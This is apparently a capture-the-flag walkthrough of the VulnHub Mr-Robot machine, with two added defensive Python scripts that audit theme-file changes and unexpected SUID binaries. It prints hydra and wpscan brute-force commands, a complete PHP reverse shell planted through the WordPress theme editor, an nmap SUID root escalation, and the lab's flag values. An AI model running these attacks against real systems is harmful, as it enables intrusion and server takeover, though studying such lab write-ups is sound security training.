Vulnhub project: MrRobot

Target machine: Mr-Robot: 1 ~ VulnHub

Penetration process:

Let's look at the description first: there are 3 keys on this machine.

First, find the target machine's IP address and scan it for open ports.

Browsing to the machine's address brings up a very cool web interface. Mr. Robot is an American TV series, and a good one.

There is no other information, so I brute-forced directories and found /admin, robots.txt, and the WordPress-related directories.

robots.txt lists a key file and a dictionary file; requesting the dictionary file downloads it.

Download the key file to the local machine.

View the first key:

key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

Use nikto to scan the site for vulnerabilities.

Nikto turns up nothing, so go straight to the WordPress login form and try logging in with any username. The error message reveals whether the username exists, so the username can be brute-forced first with the dictionary!

Capture the login request to see how the POST is built!

hydra -L fsocity.dic -p xiaoli 192.168.56.129 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"

Here hydra's http-post-form module is used to brute-force the username; the password is arbitrary, and F=Invalid username marks a failed guess. This confirms that the username is Elliot, the protagonist's name. The password is brute-forced next with the same dictionary, but it is huge and the run would take far too long, so trim it first by removing all duplicate entries:

sort -u fsocity.dic > wordlist.dic

Then brute-force the password with wpscan:

wpscan --url http://192.168.56.129/wp-login/ -U Elliot -P wordlist.dic

The brute-force finds Elliot's password: ER28-0652

Log in to the admin backend and look around.

I'm tired of reading English, so I switched the interface to Chinese!

Under Appearance there is a theme editor that exposes the site's files. Write a shell directly into one of these files; if you don't feel like writing one, just use the one that ships with Kali. Remember to change the IP and port to your own! Then update the file, request it by URL, and that's it!

Kali's bundled PHP reverse shell (pentestmonkey's php-reverse-shell.php):

<?php


set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.104';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // without this, $daemon is undefined inside the function and output is never suppressed
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Change the IP to your Kali machine's IP, and pick any port you like.
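From the defender's side, the step above is a theme file under wp-content changing on disk without a deployment, and the new content calling functions a theme never needs (fsockopen, proc_open). The script below is an added example for this page, not code from the walkthrough or from WordPress: it snapshots SHA-256 hashes of the PHP files under a theme directory, later diffs the tree against that baseline, and lists the risky calls found in every new or changed file. The demo builds a constructed theme in a temporary directory (the theme name "sometheme", its files and the tiny overwrite stub are all made up) and then simulates an edit like the one made through the theme editor.

```python
import hashlib
import os
import re
import tempfile

# PHP functions a theme template has no business calling. Constructed list for
# the example; extend it to taste.
RISKY = re.compile(r"\b(fsockopen|proc_open|popen|shell_exec|passthru|eval|base64_decode)\s*\(")


def hash_tree(root):
    """Return {relative path: sha256 hex} for every .php file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                out[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return out


def diff_baseline(baseline, current):
    """Split the current snapshot into (added, changed, removed) relative to baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return added, changed, removed


def risky_calls(path):
    """Sorted, de-duplicated names of RISKY functions referenced in the file."""
    with open(path, "r", errors="replace") as f:
        return sorted(set(RISKY.findall(f.read())))


def audit(root, baseline):
    """Return {relative path: [risky functions]} for files new or changed since baseline.
    A file with an empty list still changed and still deserves a look."""
    added, changed, _ = diff_baseline(baseline, hash_tree(root))
    return {p: risky_calls(os.path.join(root, p)) for p in added + changed}


def demo():
    """Build a constructed theme, baseline it, tamper with it, and audit. Returns the report."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "sometheme")
        os.makedirs(theme)
        with open(os.path.join(theme, "404.php"), "w") as f:
            f.write("<?php get_header(); ?><h1>Not found</h1>")
        with open(os.path.join(theme, "functions.php"), "w") as f:
            f.write("<?php add_theme_support('title-tag');")
        baseline = hash_tree(root)   # snapshot taken while the site is known-good

        # Simulated theme-editor edit: 404.php overwritten with a constructed,
        # non-functional stub that merely names the two calls, plus a new file.
        with open(os.path.join(theme, "404.php"), "w") as f:
            f.write("<?php fsockopen('HOST', 0); proc_open('', [], $p); ?>")
        with open(os.path.join(theme, "x.php"), "w") as f:
            f.write("<?php echo 'hi';")
        return audit(root, baseline)


if __name__ == "__main__":
    for path, calls in demo().items():
        print(path, calls or "(no risky calls, but modified)")
```

Run against a real install, take the baseline right after deployment and re-run hash_tree on a schedule; any hit is a file that changed outside your release process. The editor itself can be switched off in wp-config.php with define('DISALLOW_FILE_EDIT', true);, which removes the exact foothold the walkthrough uses even when admin credentials have been guessed.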

OK! I got the reverse shell and found the second key in /home/robot. But it still won't let me read it: not enough permissions! Next to it sits an MD5 password hash. So, one more round.

I fed robot's MD5 hash to a cracker and it fell straight away.

That password deserves a big thumbs up! What a show!

Switch to the robot user, go back to the folder, and get the second key.

key-2-of-3.txt
822c73956184f694993bede3eb39f959

For the last one, privileges have to be escalated. Same routine as always: check for SUID binaries, and there is nmap!

Look at nmap's options: which one to use?

At the bottom there is an interactive mode. Inside that interactive session, type !sh. Doesn't that drop you into a root shell?
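The SUID nmap is the kind of thing a periodic audit catches before an attacker does: list every setuid/setgid file and compare it against the set the build is supposed to have. The audit below is an added example for this page, not part of the walkthrough; the allowlist is a constructed starting point for a Debian-style host (tune it per image), the SAMPLE_ENTRIES snapshot is made up to stand in for a real scan, and the /usr/local/bin/nmap path in it is an assumption, not something the page states. The policy check is kept separate from the filesystem walk so it can be tested without root.

```python
import os
import stat

# Constructed allowlist: binaries that legitimately carry the setuid bit on a
# typical Debian/Ubuntu-style host. Not authoritative; adjust to your build.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su", "/bin/ping",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/bin/mount", "/bin/umount",
}


def unexpected_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, st_mode). Return sorted paths of regular files
    that have the setuid or setgid bit set and are not on the allowlist."""
    return sorted(
        path for path, mode in entries
        if stat.S_ISREG(mode)
        and mode & (stat.S_ISUID | stat.S_ISGID)
        and path not in expected
    )


def walk_modes(root="/"):
    """Yield (path, st_mode) for files under root. Uses lstat so symlinks are not
    followed, and prunes pseudo-filesystems that would only add noise."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []      # do not descend
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                yield full, os.lstat(full).st_mode
            except OSError:
                continue          # vanished or unreadable; skip


# Constructed snapshot standing in for walk_modes() output on the target machine.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd",      stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/sudo",        stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/local/bin/nmap",  stat.S_IFREG | stat.S_ISUID | 0o755),  # assumed path; the walkthrough's finding
    ("/usr/bin/python3",     stat.S_IFREG | 0o755),                 # no special bits
    ("/var/log",             stat.S_IFDIR | stat.S_ISGID | 0o755),  # setgid directory, not a binary
]


if __name__ == "__main__":
    # Audit the live system: python3 suid_audit.py (run as root for full coverage)
    for path in unexpected_suid(walk_modes("/")):
        print("unexpected setuid/setgid:", path)
```

On the sample snapshot only /usr/local/bin/nmap is reported: passwd and sudo are allowlisted, python3 carries no special bits, and the setgid /var/log is a directory rather than an executable. The fix for a hit like nmap is to drop the bit (chmod u-s) unless there is a documented reason for it, and nmap in particular has no need to run setuid.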

 

Just like that, privilege escalation succeeded and I got the third key.

key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

This penetration test is done!

Summary:

Finally, the approach for this penetration test in outline:

1. Determine the target IP and scan for open ports.

2. Browse the web service and collect useful information.

3. If there is nothing useful, brute-force directories, collect information, find the admin backend, obtain sensitive files, and find the first key.

4. Use the sensitive files to determine the login username, then crack the username and password.

5. Log in to the backend with the cracked credentials and look for exploitable weaknesses.

6. Find an editor that can modify files, write the file, request it, and get a reverse shell.

7. With the shell, collect server information and obtain the second key.

8. Escalate privileges to obtain the final key.

9. Clean up traces.


Source: blog.csdn.net/weixin_43938645/article/details/130269162